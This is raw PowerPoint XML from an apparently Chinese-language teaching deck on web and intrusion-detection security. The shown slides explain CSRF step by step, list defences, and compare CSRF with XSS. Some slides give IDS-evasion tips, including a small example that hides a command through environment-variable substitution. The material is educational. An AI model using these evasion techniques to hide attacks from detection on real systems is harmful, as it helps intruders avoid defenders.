            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>来实现会话劫持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7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22135" y="2946224"/>
            <a:ext cx="5812325" cy="5866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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击及防范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攻击者假冒受信任的第三方网络发送恶意请求，如交易转账，发邮件，发布网站，更改邮箱密码或邮箱地址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CSRF(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站请求伪造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CSRF(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站请求伪造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8275" y="1233055"/>
            <a:ext cx="8705725" cy="5366342"/>
            <a:chOff x="329934" y="86022"/>
            <a:chExt cx="8705725" cy="542594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28" y="2482712"/>
              <a:ext cx="952500" cy="9525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0968" y="342119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用户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42339" y="101619"/>
              <a:ext cx="3223959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l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>：存在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>漏洞的网站</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>：恶意攻击者</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>：受害者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200210" y="1296189"/>
              <a:ext cx="1967205" cy="1974715"/>
              <a:chOff x="2703683" y="1962629"/>
              <a:chExt cx="1967205" cy="197471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703683" y="2136121"/>
                <a:ext cx="1967205" cy="1465174"/>
                <a:chOff x="3566711" y="1484084"/>
                <a:chExt cx="2342458" cy="1588571"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="29" name="Picture 2" descr="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1576578201836&amp;di=ba5aa919eea75c797410b1df5680895d&amp;imgtype=0&amp;src=http%3A%2F%2Fa.hiphotos.baidu.com%2Fzhidao%2Fpic%2Fitem%2F4b90f603738da977196b6fa8bb51f8198718e3e9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9289" y="1484084"/>
                  <a:ext cx="857299" cy="11881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文本框 29"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3566711" y="2672218"/>
                  <a:ext cx="2342458" cy="400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网站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（受信任）</a:t>
                  </a:r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2704288" y="1962629"/>
                <a:ext cx="1809029" cy="197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10124" y="3528281"/>
              <a:ext cx="1809029" cy="1974715"/>
              <a:chOff x="4628876" y="4153711"/>
              <a:chExt cx="1809029" cy="197471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671616" y="4527891"/>
                <a:ext cx="1723549" cy="1299342"/>
                <a:chOff x="3972602" y="3915483"/>
                <a:chExt cx="1723549" cy="1299342"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="24" name="Picture 2" descr="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1576578201836&amp;di=ba5aa919eea75c797410b1df5680895d&amp;imgtype=0&amp;src=http%3A%2F%2Fa.hiphotos.baidu.com%2Fzhidao%2Fpic%2Fitem%2F4b90f603738da977196b6fa8bb51f8198718e3e9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787" y="3915483"/>
                  <a:ext cx="772276" cy="953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0736" y="4192186"/>
                  <a:ext cx="502809" cy="583897"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="26" name="文本框 25"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3972602" y="4845493"/>
                  <a:ext cx="1723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网站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（恶意）</a:t>
                  </a:r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>
                <a:off x="4628876" y="4153711"/>
                <a:ext cx="1809029" cy="197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329934" y="1240377"/>
              <a:ext cx="1024810" cy="4271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612001" y="86022"/>
              <a:ext cx="4423658" cy="1200329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just"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>6. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>由于浏览器会带上用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>，网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>不知道步骤</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的请求是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>发出的，因此网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>会根据用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的权限处理步骤</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的的请求，这样就达到了伪造用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>请求的目的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19632" y="1240377"/>
              <a:ext cx="3275256" cy="369332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l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>浏览并登录正常网站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37190" y="1791569"/>
              <a:ext cx="4268733" cy="369332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l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>2. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>验证通过，浏览器生成网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>cookie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49936" y="3437572"/>
              <a:ext cx="3771798" cy="646331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l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>3. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>在没有登录退出网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的情况下，访问恶意网站</a:t>
              </a:r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58289" y="4817928"/>
              <a:ext cx="3390672" cy="369332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l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>4. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>要求访问第三方网站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9936" y="2359165"/>
              <a:ext cx="4208350" cy="646331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l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>5. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>根据</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>在步骤</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的要求，浏览器带着步骤</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>处产生的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>访问网站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354744" y="1609709"/>
              <a:ext cx="4846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354744" y="2209681"/>
              <a:ext cx="4846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347328" y="3005496"/>
              <a:ext cx="4846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347328" y="4057837"/>
              <a:ext cx="4846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368693" y="5187260"/>
              <a:ext cx="4846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13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防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>攻击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411288"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>现有银行的网银交易流程要比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>复杂得多，同时还需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>USB key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、验证码、登录密码和支付密码等一系列安全信息，一般并不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全漏洞，安全是有保障的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>。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140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CSRF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XSS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1443327"/>
            <a:ext cx="7772400" cy="4624964"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重大的差别：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端的漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>客户端的漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击是实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击前的一个重要步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击获取有用的攻击信息，比如通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造一个提示用户输入身份信息的表单。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7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防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>攻击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1" y="1328161"/>
            <a:ext cx="7891173" cy="4781694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>设定短暂的可信用户会话时间，完成任务后记得退出可信会话，删除所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>每次提出一个可信行为时，对发出请求的用户进行验证；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>让网站记住登录用户名和密码时要小心。留在客户端的登录信息可能会攻击者加以利用；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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>和表单中增加的每个请求，必须提供基本会话令牌以外的每个请求用户验证；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>从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应用程序中删除所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>漏洞。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945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4E2FF7F-D6D6-41E4-A71A-27A762B61E75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327683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黑客的隐秘攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62566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不直接使用从众所周知的黑客网站下载的程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>攻击程序不使用罕见的系统调用，某些使用了人工智能算法的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>会监视系统调用，一段程序的系统调用大致固定，如受到攻击打乱正常的系统调用，可通过对系统调用序列的分析检测出来。基于内核的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>也会对某些敏感的系统调用进行监视</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15495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130172D-2DD1-4E29-A686-92A7FABE1A2F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:pPr algn="l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328707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黑客的隐秘攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1700213"/>
            <a:ext cx="7772400" cy="4818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使用环境变量执行命令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Echo “jumping to adddress”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Set ell=e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Set carrot=c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Set apple=a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Set janet=jump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Set sanke=ss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${ell}${carrot}ho “${janet}ing to ${apple}addr ${ell}$snake”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这些隐秘攻击手段只是很小的一部分，因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>应当具有抗隐秘攻击的能力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而为了识别这些隐秘是攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>在性能上将会大幅度下降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34867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16703</TotalTime>
  <Words>4887</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>429</Paragraphs>
  <Slides>78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標楷體</vt:lpstr>
      <vt:lpstr>PMingLiU</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Webdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Blends</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>隐秘攻击技术</vt:lpstr>
      <vt:lpstr>简单模式匹配技术的缺点</vt:lpstr>
      <vt:lpstr>简单模式匹配技术的缺点</vt:lpstr>
      <vt:lpstr>黑客的隐秘攻击</vt:lpstr>
      <vt:lpstr>黑客的隐秘攻击</vt:lpstr>
      <vt:lpstr>黑客的隐秘攻击</vt:lpstr>
      <vt:lpstr>黑客的隐秘攻击</vt:lpstr>
      <vt:lpstr>IDS的根本问题</vt:lpstr>
      <vt:lpstr>IDS在安全体系结构中层次的两种观点</vt:lpstr>
      <vt:lpstr>IDS在安全体系结构中层次的两种观点</vt:lpstr>
      <vt:lpstr>一个例子</vt:lpstr>
      <vt:lpstr>缺点</vt:lpstr>
      <vt:lpstr>Web网站攻击技术</vt:lpstr>
      <vt:lpstr>内容提纲</vt:lpstr>
      <vt:lpstr>Web应用程序体系结构</vt:lpstr>
      <vt:lpstr>Web应用体系结构潜在弱点</vt:lpstr>
      <vt:lpstr>Web应用体系结构潜在弱点</vt:lpstr>
      <vt:lpstr>Web应用安全</vt:lpstr>
      <vt:lpstr>HTTP协议安全问题</vt:lpstr>
      <vt:lpstr>Cookie的安全问题</vt:lpstr>
      <vt:lpstr>Cookie安全问题</vt:lpstr>
      <vt:lpstr>Cookie安全问题</vt:lpstr>
      <vt:lpstr>Cookie安全问题</vt:lpstr>
      <vt:lpstr>Cookie安全问题</vt:lpstr>
      <vt:lpstr>Cookie安全问题</vt:lpstr>
      <vt:lpstr>内容提纲</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>注入漏洞</vt:lpstr>
      <vt:lpstr>SQL注入原理</vt:lpstr>
      <vt:lpstr>SQL注入原理</vt:lpstr>
      <vt:lpstr>SQL注入攻击流程</vt:lpstr>
      <vt:lpstr>SQL注入示例</vt:lpstr>
      <vt:lpstr>SQL注入：案例</vt:lpstr>
      <vt:lpstr>SQL注入：案例</vt:lpstr>
      <vt:lpstr>SQL注入：案例</vt:lpstr>
      <vt:lpstr>SQL注入：案例</vt:lpstr>
      <vt:lpstr>SQL注入：案例</vt:lpstr>
      <vt:lpstr>SQL注入：检测</vt:lpstr>
      <vt:lpstr>SQL注入：检测</vt:lpstr>
      <vt:lpstr>http://xxx.xxx.xxx/abc.asp?id=YY</vt:lpstr>
      <vt:lpstr>http://xxx.xxx.xxx/abc.asp?id=YY</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>SQL注入漏洞的防护</vt:lpstr>
      <vt:lpstr>SQL注入漏洞的防护</vt:lpstr>
      <vt:lpstr>SQL注入漏洞的防护</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>跨站脚本攻击</vt:lpstr>
      <vt:lpstr>跨站脚本攻击两个前提</vt:lpstr>
      <vt:lpstr>跨站脚本攻击三种形式</vt:lpstr>
      <vt:lpstr>跨站脚本攻击</vt:lpstr>
      <vt:lpstr>XSS攻击的原理</vt:lpstr>
      <vt:lpstr>XSS漏洞探测示例</vt:lpstr>
      <vt:lpstr>反射式XSS</vt:lpstr>
      <vt:lpstr>反射式XSS</vt:lpstr>
      <vt:lpstr>反射式XSS</vt:lpstr>
      <vt:lpstr>储存式XSS</vt:lpstr>
      <vt:lpstr>储存式XSS</vt:lpstr>
      <vt:lpstr>储存式XSS</vt:lpstr>
      <vt:lpstr>储存式XSS</vt:lpstr>
      <vt:lpstr>储存式</vt:lpstr>
      <vt:lpstr>DOM式XSS</vt:lpstr>
      <vt:lpstr>DOM式XSS</vt:lpstr>
      <vt:lpstr>DOM式XSS</vt:lpstr>
      <vt:lpstr>防御XSS攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>伪造Cookie信息</vt:lpstr>
      <vt:lpstr>伪造Cookie信息</vt:lpstr>
      <vt:lpstr>伪造Cookie信息</vt:lpstr>
      <vt:lpstr>伪造Cookie信息</vt:lpstr>
      <vt:lpstr>监听Cookie来实现会话劫持</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>CSRF(跨站请求伪造)</vt:lpstr>
      <vt:lpstr>CSRF(跨站请求伪造)</vt:lpstr>
      <vt:lpstr>防御CSRF攻击</vt:lpstr>
      <vt:lpstr>CSRF与XSS</vt:lpstr>
      <vt:lpstr>防御CSRF攻击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unknown</dc:creator>
  <cp:lastModifiedBy>ZXL</cp:lastModifiedBy>
  <cp:revision>1611</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-07-10T13:16:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-12T05:32:40Z</dcterms:modified>
</cp:coreProperties>
</file>